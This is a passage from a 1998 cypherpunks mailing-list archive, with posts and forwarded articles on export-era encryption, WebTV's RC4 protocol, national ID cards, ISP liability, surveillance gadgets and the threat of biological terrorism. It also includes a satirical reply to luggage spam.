pedophiles and child pornographers."  (AP/Washington Post 15 Oct 98)
--
Peter J. Celano    petec@iname.com
pgp key on request
<http://ic.net/~celano>   member SPECLUSA    < ><
Ready to DO something?  Try <http://ic.net/~celano/ip/>
Always remember - LIPS SINK SHIPS!!!




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <squirrel7@nym.alias.net>
Date: Fri, 16 Oct 1998 07:54:50 +0800
To: cypherpunks@toad.com
Subject: wtf...
Message-ID: <a21c0c83b21f67a9f3c269579d7f7277@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Has this list server died or is it just me?

it seems like the list has died or is it just slowly fading into oblivion? It seems as though the only people still posting come from some great spam factory in left field. Have all of the questions been answered? Is everyone happy with the encryption they have? Doesn't anyone have any new thoughts on export restrictions, hash implementations, or the like? I know that I'm still out here, is anyone else?

Does this ring a bell? 
People must come and together deploy these systems for the common good.  Privacy only extends so far as the cooperation of one's fellows in society.  We the Cypherpunks seek your questions and your concerns and hope we may engage you so that we do not deceive ourselves.  We will not, however, be moved out of our course because some may disagree with our goals.

Who else is out there?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 16 Oct 1998 00:46:28 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: "It's a Hardware Problem..."
In-Reply-To: <v04011720b248f21a987e@[139.167.130.246]>
Message-ID: <Pine.LNX.3.96.981016001112.5070B-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Oct 1998, Robert Hettinga wrote:

> "Computer firewalls have always been dependent on software, which means
> they are 'soft' and subject to manipulations," says Larry Dalton, manager
> of Sandia's High Integrity Software Systems Engineering Department. "Our
> device is hardware and is extremely difficult to break into. You have one
> and only one chance in a million of picking exactly the right code compared
> to a one in 10,000 chance, with many additional chances, in most software
> firewalls. After one failed try, this new device mechanically shuts down
> and can't be reset and reopened except by the owner."

Sounds like a great denial of service attack.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 16 Oct 1998 00:45:27 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: Re: Soccer Moms?
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F84C8@MSX11002>
Message-ID: <Pine.LNX.3.96.981016001308.5070C-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Oct 1998, Brown, R Ken wrote:

> 
> In the middle of an interesting article about digital cash, forwarded
> here by Bob Hettinga, there was the line:
> 
> > After all, the kind of soccer moms who elected Bill Clinton
> 
> "Divided by a common language" as I am  I genuinly don't know what that
> means. And I can't even guess from context. I'd have expected a dig at
> liberals or feminists or welfare recipients at that point; and I can't
> work out what soccer has to do with it.
> 
> Do mothers play soccer much in the USA?
> 
> Football (as the 95% of the world's population that aren't either
> English-speaking North Americans or else Rugby fans call the Beautiful
> Game) is associated in my mind with young men, specifically working
> class men. It's connotations are entirely macho, even violent.  When a
> big match is on men gather in pubs and bars and shout at TVs whilst
> knocking back the lager. You avoid the centre of town if you don't want
> to risk getting involved in a fight.  People get *killed* at football
> matches.  That's pretty much true in every big city inthe world outside
> North America (and Japan where the fans are polite). 
> 
> This honestly isn't a troll - I am in fact bewildered by the phrase.  

Basically the phrase refers to suburban housewives.  (Mothers who have
time to take their little sprogs to school soccer games and the like.)

The image of suburban housewives getting involved in World Cup style
brawls and rioting does have a certain appeal though. ]:>

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 16 Oct 1998 15:08:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: ISP not liable for customer's messages
In-Reply-To: <199810160538.WAA28804@netcom13.netcom.com>
Message-ID: <199810160639.BAA18347@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain




> An appeals court in Florida has ruled against a woman who sued 
> America Online because one of its customers, a convicted sex 
> offender, used an AOL chat group to try to sell the woman's 
> 11-year-old son a pornographic video. The court said that federal law 
> protects online services from being held liable for the messages 
> transmitted by their members sell the videotape of the boy. The 
> defeated lawsuit, which is being appealed to the Supreme Court, tried 
> to characterize America Online as "a home shopping network for 
> pedophiles and child pornographers."  (AP/Washington Post 15 Oct 98)

As I recall, the individual was trying to sell a pornographic video
featuring the woman's 11 year old son, which is another thing entirely.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 16 Oct 1998 21:46:10 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: ** National ID Alert - Again **
In-Reply-To: <199810160538.WAA28778@netcom13.netcom.com>
Message-ID: <4.0.2.19981016085918.0093d950@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Read my story at wired.com for details -- no need to panic.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 16 Oct 1998 21:38:36 +0800
To: cypherpunks@cyberpass.net
Subject: DoT National ID card delayed; CDA II signed soon
Message-ID: <199810161306.GAA11596@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain





>Date: Thu, 15 Oct 1998 18:45:12 -0700 (PDT)
>From: Declan McCullagh <declan@well.com>
>To: politech@vorlon.mit.edu
>Subject: FC: DoT National ID card delayed; CDA II signed soon
>X-No-Archive: Yes
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>http://www.wired.com/news/news/politics/story/15635.html
>
>Newt Caves on National ID Cards
>by Declan McCullagh 
>
>                     5:45 p.m.  15.Oct.98.PDT
>                     When the staff at the conservative Free
>                     Congress Foundation learned Thursday
>                     that legislation postponing a federal plan
>                     to standardize US drivers licenses was in
>                     trouble, they turned to the Internet for
>                     help. 
>
>                     Patrick Poole, deputy director of the
>                     groups Center for Technology Policy,
>                     quickly fired off an email alert to 500
>                     grassroots conservative and libertarian
>                     groups. He said Representative Lamar
>                     Smith (R-Texas) was trying to preserve
>                     regulations creating de facto national ID
>                     cards, and he urged readers to let
>                     Congress know exactly what middle
>                     America thought about such big
>                     government boondoggles...
>
>
>
>http://www.wired.com/news/news/politics/story/15638.html
>
>CDA II Bound for Clinton's Desk
>by Declan McCullagh 
>
>                     2:45 p.m.  15.Oct.98.PDT
>                     Wielding a potent political bludgeon -- by
>                     accusing Democrats of being soft on
>                     pornography just weeks before the
>                     election -- Republicans on Thursday
>                     inserted the sequel to the
>                     Communications Decency Act into a
>                     sprawling $500 billion spending bill. 
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 17 Oct 1998 01:22:13 +0800
To: squirrel7@nym.alias.net>
Subject: Re: wtf...
Message-ID: <de9198ffc95256bc10613cb11691afa0@anonymous>
MIME-Version: 1.0
Content-Type: text/plain





Mohammed Lazhar wrote:
> 
> hey Guys :
>    I just subscribed to the list. I will be posting stuff soon
>    Mohammed

Please let me know as soon as you post amything!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 16 Oct 1998 21:12:54 +0800
To: pablo@microsoft.com
Subject: Re: FYI: More on WebTV security
In-Reply-To: <v04020a51b24c4b244dc8@[139.167.130.246]>
Message-ID: <199810160938.KAA13027@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Pablo Calamera writes:
> > Perhaps I am overly cynical, but I am guessing that they are
> > using SSL (TLS) from a web based email application on the
> > client to WebTV's servers. I presume email data is decrypted
> > at the servers, then re-encrypted to the recipient when she
> > uses the WebTV client to read email.
> 
> Close.  We could not even export SSL (TLS) with 128 encryption in
> this scenario.  We have a proprietary transport protocol that we use
> that employs 128 bit RC4.

Hope you are doing sensible things with RC4 -- sounds like you/webTV
group know what you are doing, but we have seen a lot of dumb things
done with RC4 by microsoft (and by others) in the last couple of
years.  Things like using the same key multiple times (doh!) etc.

Only it is worrying that they would refuse SSL (which is presumably
going to be 128 bit RC4) and make you design another SSL-alike
replacement which uses the same cipher and key size.  Perhaps they are
hoping that you will make subtle errors in a non-peer reviewed
protocol.  As you have given them your protocol spec (they require
this, so I presume you have), it may be that your export permission
hinges on a exploitable flaw they have found.  SSL went through a few
revisions before it got to be very secure.

The other crucial point is this: do you use a forward secret key
negotation alogrithm?  So that a court ordered demand for decryption
definately only gets traffic from that point onwards (and not all
traffic going backwards if the LEA has been unofficially recording all
the traffic to the user / all users).

> Partially true. We believe a major component of our security is indeed in
> the encrypted transport of your email from the service through the internet,
> through a leased POP to your box.  Our Privacy Policy and Terms of Service
> are available for your viewing.
>   http://webtv.net/home/privacy_text.html
>   http://webtv.net/home/tos_text2.html

Will look at those, thanks.

> > I am concerned that carefully constructed wording of
> > Microsoft's press release implies stronger email security
> > than really exists. I hope I am wrong.
> 
> We believe that with the level of encryption and the quality of our network
> operations that we have the best level of privacy protection for our users
> of any online service.  

That's a strong claim.  I don't think you provide as much privacy as
say Infonex (pay with cash, no ID required), ssh, use a nymserver,
anonymous web pages etc.  There are a few others with similar offers
also.

I wonder -- do you archive mail?  (As it goes in the clear through
your mail hub which the users are connecting to.)

> I agree that the carefully worded press release may imply more than
> what we got.  But we are very happy with this initial step.  It has
> taken a very long time just to get export approval for this
> architecture and we look forward to further relaxation of export
> controls so we can compete on even footing with our foreign
> competitors.

It does seem to be somewhat of a relaxation, and is potentially useful
at that.  For example Phil Karn said Qualcomm where refused use of
3DES between their US and an non-US office with only their own staff
using it, though this was a few years ago.

In all I am very pleased to see this being discussed.  Microsoft as a
norm does not get involved in answering it's critics (in other than
carefully spun press releases).  

Thanks!

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 17 Oct 1998 02:07:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: ISP not liable for customer's messages
In-Reply-To: <Pine.BSF.3.91.981014145345.29120A-100000@mcfeely.bsfs.org>
Message-ID: <199810161720.MAA19054@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Wombat writes:

> > As I recall, the individual was trying to sell a pornographic video
> > featuring the woman's 11 year old son, which is another thing entirely.

> Not really. If the service providor is to be held accountable for what 
> its members post/say/etc., they would have to monitor *all* traffic in 
> order to police their members. In addition, even if the providor *were* 
> monitoring, they can only be reactive - do you expect them to monitor and 
> censor all traffic before releasing it?

I was merely correcting a factual error in the prior post. 

Clearly, a parent is likely to feel more outrage towards AOL if
pornographic videos of their 11 year old son are being openly sold online
by the child's victimizer, than if some random person tries to sell said
11 year old a piece of mainstream erotica. 

Pointing out why this parent is so bent out of shape over this is not the
moral equivalent of suggesting that servuce providers should be held
accountable for content they do not originate, which I do not support. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@toad.com
Date: Fri, 16 Oct 1998 20:51:18 +0800
To: <cypherpunks@toad.com>
Subject: ADfilter 2.1 Registration Code
Message-ID: <0174930471110a8CLWEB1@clweb1.i-way.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for trying ADfilter 2.0

Your email address is: cypherpunks@toad.com
Your personal ADfilter key is X3KCZ-K9994

Visit our web site at http://www.adfilter.com to purchase the full
ADfilter 2.0 Professional for just US$19.95!

Installing ADfilter:
Run ADFSETUP.EXE. This will install ADfilter on your computer. As soon as
installation is complete, ADfilter will show you a registration screen.
Enter the e-mail address to which your registration key has been sent (you
entered this before you downloaded ADfilter) and the registration code
that has been sent to that e-mail address. Remember to include all
punctuation when completing these two fields.

Check that the ADfilter icon appears in your Windows system tray (bottom
right of your screen). The icon is green when ADfilter is on and red when
ADfilter is off. Double-clicking the icon opens ADfilter's configuration
screens.

If you encounter any difficulties you will find additional help on the
ADfilter support page or you can contact us at support@adfilter.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 16 Oct 1998 22:05:41 +0800
To: cypherpunks@toad.com
Subject: Disk (block device) encryption for Linux and *BSD?
Message-ID: <bd2017dd20d31dc4297751e94f5aa776@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




Apologies for the interruption,

I'm looking for disk / partition encryption for Unix-alikes, especially
Linux, OpenBSD and/or NetBSD.

My websearch has been less than satisfactory - I found outdated Linux
kernel patches for encryption loopback, and I distinctly remember reading
about a serious bug in the use (or lack thereof) of key material in this
code.

Do patches for a current Linux kernel exist, and have all the known
bugs been fixed?

Also, there seems to be no version of Marutukku about that I can actually
get to work on *BSD. Is Marutukku still being developed?

Generally, is there a good page that tracks disk encryption for Unix?

I'm currently using cfs here and there, and I have a specific question
about that package, too:

Does the cypherpunks list trust the patches that add Blowfish support
to cfs?

Questions questions..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 17 Oct 1998 06:32:36 +0800
To: cypherpunks@toad.com
Subject: Adam Back
Message-ID: <0bd290677b2efe4d0a531bc586530176@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?ViewItem&item=35781839




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 17 Oct 1998 06:33:15 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.47: High-Tech Spying Gear Not Just For 007
Message-ID: <199810162207.PAA09993@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.47: High-Tech Spying Gear Not Just For 007
Date: Fri, 16 Oct 1998 00:37:06 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.47: High-Tech Spying Gear Not Just For 007
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday October 16, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: ABC News.com, October 7, 1998
http://www.abcnews.com

Surveillance Tools Get Smarter, Smaller
What the Watchers Use
http://www.abcnews.com/sections/tech/DailyNews/spytech981007.html

By
Chris Stamper, spies@stamper.com
ABCNEWS.com

Are you being watched? Or listened to? High-tech spying gear is making
surveillance easier as the equipment gets smaller. And it's not restricted
to Big Brother.   The Searchcam allows for filming in tight
corners.(Surveillance Systems)

     Bill DeArman, a senior special agent of the Customs Service, says that
most privacy threats today come from gizmos bought in shopping malls, not
obtained on the black market from KGB or Mossad defectors. A cheap
disposable camera or a hand-held tape recorder can be as dangerous as the
latest surveillance equipment.

    "People are looking for the ultimate gizmos, but the people who commit
crimes aren't necessarily high-tech," DeArman says.


What the Pros Use:

But if it's the high-end, expensive gear you want, that's increasingly
available to civilians.

    Pinhole video cameras, for example, can be hidden in an wide variety of
household products. "You need a hole as small as 1/16 of an inch." says
Jeff Hall, vice president of Gadgets By Design, a Lansing, Mich.-based
company that makes surveillance equipment. "We've put them in light
fixtures, computers and VCRs."

    A basic pinhole video cam costs $129, according to Hall.

    They're called "pinhole" because they have extremely small lenses, not
because they resemble the toys children make from oatmeal boxes. A wire
runs from the tiny TV camera to a transmitter or a recording VCR. Hall's
company has hidden these cameras in hats, thermostats, wristwatches and
smoke detectors.

     Most of the company's sales come from businesses that want to keep
track of their stock or watch their employees. "If you wanted to put a
camcorder in the back room, it's hard to do that inconspicuously," he says.
"We have to get smaller and smaller to stay one step ahead of the bad
guys."


The Latest Fashion:

A New York company called Electronic Security Products sells wearable
cameras disguised as brooches, pens and eyeglasses. "They're used for
recording video one-on-one," says company president Avi Gilor. A wire runs
from the camera to a transmitter concealed in a pocket.

      If there's no light to see by, then infrared can come in handy.
Bakersfield, Calif.-based Search Systems sells the probelike Searchcam
($10,687) to law enforcement and rescue workers in tight corners. An
infrared camera shaped like a long nightstick, the Searchcam is meant to be
poked into small openings such as heat vents, doorways and windowsills.

     "Officers in a high-risk situation can extend their eyes and ears in
places where they wouldn't put their heads," says Scott Park, president of
Search Systems.


Listen to Birds-Not People:

U.S. law says little about video surveillance, so just about anyone can
watch you without fear of prosecution. Audio surveillance, on the other
hand, is regulated by the 1984 Omnibus Crime Control Act, and arrests and
prosecutions for eavesdropping are not uncommon. Ronald Kimble, America's
biggest spy shop owner, is currently serving a five-month sentence after
being busted in 1995 on 70 counts of dealing in illegal wiretapping
equipment. Kimble spent 11 years as an agent with the Drug Enforcement
Agency before starting a chain of stores called The Spy Factory.

    Bugging devices, often hidden in household items, are confiscated daily
at the border by Customs agents. The Customs Service says the law is too
weak, however; criminals only face up to six months for each count of
importing spy equipment.    A camera could be hiding in what appears to be
a thermostat. (Gadgets by Design)

    "The consensus of opinion is that technology has grown so rapidly, so
quickly, that laws aren't up to speed," says agent DeArman.

    Often the legality of an item depends on its use. Parabolic
microphones, for example, can be legally used for bird-watching or for
professionally recording sports events. These devices, which look like
small, hand-held satellite dishes, are 75 times more powerful than standard
mikes and usually cost about $900.

    "A parabolic microphone, if it looks like a dish at a football game, is
a legal device," DeArman says " If you disguise it as an umbrella to listen
to what people have to say, then it's illegal."

Copyright (c)1998 ABCNEWS


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.








****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 17 Oct 1998 06:33:29 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Silent Weapon of Mass Destruction
Message-ID: <199810162207.PAA10003@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Silent Weapon of Mass Destruction
Date: Fri, 16 Oct 1998 11:25:31 -0500
To: believer@telepath.com

Source:  Washington Times
http://www.WashTimes.com/opinion/grenier.html

The silent weapon

 By Richard Grenier
 THE WASHINGTON TIMES

There is a certain logic to it, I suppose. Two nuclear
 explosions in Japan half a century ago, with great blasts,
 great noise, mushroom clouds, many dead. It terrified America
 and much of the world and, except for military circles, little
 thought was given to the estimated million American soldiers
 who might have given their lives if they'd tried to storm Japan
 without the nuclear bombs' aid.

But that's the way it goes. A historical event surrounded by
 great theatrical effects makes a really big impression. But what
 if the next weapon of mass destruction is silent, gives no
 warning, is not preceded by a pyrotechnic blast, but takes
 effect more slowly, leaving hospitals swamped, and millions in
 great American cities with hideously blistered faces dying in the
 streets?

The doctors sent to succor them also die the same painful
 and unsightly deaths. For biological weapons now have the
 potential to wipe out cities, states and even entire national
 populations if positioned in the air, water supply or food
 supply. The food supply would progressively be shipped to
 various parts of the country, ultimately killing millions of people.
 And all, except for the groans of the dying, could be done in
 relative silence, with only the piles of dead in the streets to bear
 witness as in the Plague Years of the Middle Ages.

As pointed out by former Secretary of Defense William
 Perry, most biological agents are sensitive to heat, and
 ready-to-eat foods are the most likely vehicles for mass
 contamination. So eat up your Quick Burger and fries with
 confidence that death will soon follow. Food processing plants
 and water purification facilities also provide tempting targets.

Microorganisms, it should be noted, are a very inexpensive
 way to exterminate entire populations. Above all, many
 microorganisms can be cheaply grown, each having its own
 unique uses. As stressed by Carl Yaeger of Utah Valley State
 College and Steven Fustero, IACSP Director of Operations,
 this is a great advantage in deciding the effect wished to be
 brought about on the section of the population at which the
 attack is directed. Since the organisms are capable of rapid
 reproduction, only a small amount is required to infect a very
 large area.

But possibly more interesting than the large area to be
 infected is the selectivity. With the development of biochemistry
 and genetic engineering, it might be possible to target ethnic
 groups -- which, once it is announced to the general public,
 should do wonders for the harmony of America's various ethnic
 and racial groupings. Judging by some recent events, there are
 not a few extremist groups in the United States that would give
 little thought to wiping out thousands of "undesirables." This
 kind of germ weapon would be highly prized in the hands of
 terrorist groups, and in the hands of these terrorists could well
 be more lethal than tactical nuclear weapons.

A terrorist can accomplish his agenda in many ways with
 biological weapons. Terrorists are creative and use varying
 tactics, as is spelled out in Yonah Alexander's book
 "International Terrorism." The book gives an alarming list of
 different styles of terrorism in different parts of the world.
 Contributing to the problem is the easy availability of
 information for anyone who would mix up a bag of anything
 toxic from recipes readily accessible on the internet.

As Fred Reed points out in his essay "Publishing Do It
 Yourself Munitions Books Increases the Risk of Terrorism,"
 much of this information is not that hard to get. Even nerve gas
 has a patent that makes the formula public. Biological weapons
 do not have a single, unique effect. Human beings along with
 other animals are constantly being attacked by disease-causing
 bacteria and viruses.

Biological weapons, for the most part, create the same
 effects as any of the wide variety of naturally occurring
 diseases, which makes tracking them down so baffling. These
 artificial agents could be used merely to weaken the targeted
 population, to intimidate it with no intention of inflicting wide
 scale casualties, or simply to wipe it out. The options are many.

Biological agents can also be selective in another way, as
 they could be used to target crops and cattle or to start an
 epidemic of a highly dangerous disease such as smallpox.
 Furthermore, if an agent were released in the proper way, it
 could be months before anyone even knew how the epidemic
 had started. And there are many other advantages of using
 biological weapons. Terrorists do not necessarily need or want
 a weapon of mass destruction. A simpler biological weapon
 might be more controllable and kill enough people to suit the
 terrorists' purposes.

Still another advantage could be secrecy and concealment.
 Limited attacks could be carried out secretly before open
 "hostilities" even began. As you can see, a whole new age of
 warfare is beginning. According to an excellent PBS "Frontline"
 documentary aired this week, the Soviet Union, even under
 Mikhail Gorbachev, had already broken an international
 agreement restricting chemical and biological weapons.

But given the collapse of the Soviet Union, and the
 subsequent chaos into which Russia has since been plunged,
 where are those Russian weapons now? Perhaps, wherever
 they are -- and this is an uneasy thought -- they could be
 prepared to kill millions by being disseminated in the air by
 cans of hair spray. But most Americans don't want to think
 about this. 

Copyright (c) 1998 News World Communications, Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 17 Oct 1998 05:09:58 +0800
To: cypherpunks@cyberpass.net
Subject: Is it Keynes or Is it .... ?
Message-ID: <v04020a06b24d582b8c83@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



And now, ladies and germs, the "Spit Take of the Week" award winner...

Cheers,
Bob Hettinga

--- begin forwarded text


Date:         Fri, 16 Oct 1998 14:12:55 EDT
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      Is it Keynes or Is it .... ?
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

 >>   Is It Keynes?   <<    --   The End of Laissez-Faire


"A year or so from now, it will be difficult to find
a single person who admits ever having believed
that a global free market is a sensible way of
running the world economy .. The late-twentieth-
century political fad for the free market arose
at a time when memory of it had faded.  Mid-Victorian
laissez-faire was short-lived .. The free market came
about in England as a result not of slow evolution
but swiftly, as a consequence of the unremitting use
of the power of the state ..  The free market
withered away gradually, thought the natural workings
of democratic political competition ...

The short history of the free market in nineteenth-
century England illustrates a vital truth: Democracy and
the free market are rivals, not allies.  'Democratic
capitalism' -- the vacuous rallying cry of neoconservatives
everywhere -- signifies (or conceals) a deeply
problematic relationship.  The normal concomitant
of free markets is not stable democratic government
but the volatile -- and not always democratic -- politics
of economic insecurity.

History exemplifies an equally important fact:
Free market economies lack built-in stabilizers.
Without effective management by government,
they are liable to recurrent booms and busts --
with all their costs in social cohesion and
political stability.  The Great Depression was
partly an aftershock of the First World War
.. But is was also a consequence of governments'
holding to an orthodoxy that believed that so
long as inflation is under control the economy
can be relied upon to be self-regulating ,,,"


It's John Gray in _The Nation_.  "Not for the First
Time, World Sours on Free Markets", Oct. 19, 1998.



Is it Keynes is special service of the Hayek-L list.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 17 Oct 1998 01:32:43 +0800
To: sendus@earthcorp.com>
Subject: Re: LUGGAGE, GARMENT BAGS, BREIFCASES, ETC.
Message-ID: <a9bcd43b5fda5951a615112af5e29525@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Ms. Anges Lek,
Managing Director

We have urgent need for suitcases that enable transport of laptop computers
through customs without search. Please provide case histories.

Tim May wrote:
> 
> At 5:07 AM -0700 10/15/98, sendus@earthcorp.com wrote:
> >Dear reader,
> >
> >We have just visited your website and became interested to develop a
> >trading relationship with you company.
> >
> >We are a major manufacturer of a full range of luggage, bags, and
> >trolleys.For full details
> >mailto:sendus@earthcorp.com?Subject=BESTPLUS_IDUSTRIES_LTD.
> >
> >Thank you very much,
> >
> >Ms. Anges Lek,
> >Managing Director
> >
> 
> Thank you for posting this to our list!
> 
> We are very interested in specialized types of luggage. We seek suitcases
> and briefcases in which various items may be hidden. The usual items:
> money, papers, drugs, chemicals, and various pyrotechnic assemblies.
> 
> Please describe your experience in fabricating such items, and please list
> some of your more famous clients.
> 
> Warning: We have very high standards! The luggage we use now has been used
> to export the PGP source code disks to Finland and Holland, and such
> esteemed travellers as Pablo Escobar, Abu Nidal, and the Engineer have used
> the same products we use.
> 
> We look forward to your reply.
> 
> --Asama bin May, Director of Delivery Operations, World Liberation Front




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 17 Oct 1998 07:14:58 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Is it Keynes or Is it .... ? (fwd)
Message-ID: <199810162255.RAA32566@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Oct 1998 16:09:02 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Is it Keynes or Is it .... ?

